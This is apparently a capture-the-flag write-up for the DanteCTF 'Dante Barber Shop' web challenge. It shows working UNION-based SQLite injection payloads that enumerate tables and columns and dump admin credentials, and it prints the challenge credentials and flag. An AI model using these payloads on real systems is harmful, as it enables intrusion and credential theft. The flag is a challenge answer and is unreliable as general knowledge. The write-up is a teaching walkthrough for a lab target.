Tags: web mj0ln1r sqlinjection invaders0x1
Rating:
# Dante Barber Shop
Description :
```text
Welcome to our renowned barber shop!
Your task, should you choose to accept it, is to uncover hidden information and retrieve the sensitive data that the owners may have left around.
Challenge : https://barbershop.challs.dantectf.it
```
The website presents few photos and a login page. Viewing the source code reveals that there is an another image which was not showed in the website.
```html
```
Okay the `img/barber1.jpg` was not displayed here. By trying to access it revealed the barber credentials.
**https://barbershop.challs.dantectf.it/img/barber1.jpg**
Used `barber : dant3barbersh0p_cLIVeSidag` to login. A customer database was displayed and a search field was available to search for the entries.
When I searh for `'` in the search field a `sqlite3` error were displayed. So, It was confirmed that the `SQL Injection` vulnerability in the system.
- Then I enumerated the number of columns with the `UNION`.
- Payload `' union select 1,2,3,4--` Confirms that there were 4 columns available.
- Enumerating table name
- Payload `' union select 1,group_concat(tbl_name),3,4 FROM sqlite_master WHERE type = "table"-- ` returned the column names `users,sqlite_sequence,customers`
- Selected columns from table
- Payload `' union select 1,sql,3,4 from sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name='users'--` confirms the columns names `id,username,password`.
- So now we have table name as well as column name, final thing which we need to do is, extraction of data from the desired column which can be performed by simple SQL query.
- Payload `'union SELECT 1,username,password,4 FROM users--` printed the admin crendentials on the screen.
- `admin : nSOrowLIstERiMbrUsHConesueyeadEr`
When I logged in to the website with admin credentials, the flag was displayed in the admin dashboard.
> `Flag : DANTE{dant3_1s_inj3cting_everyb0dy_aaxxaa}`
# [Original Writeup](https://themj0ln1r.github.io/posts/dantectf23)
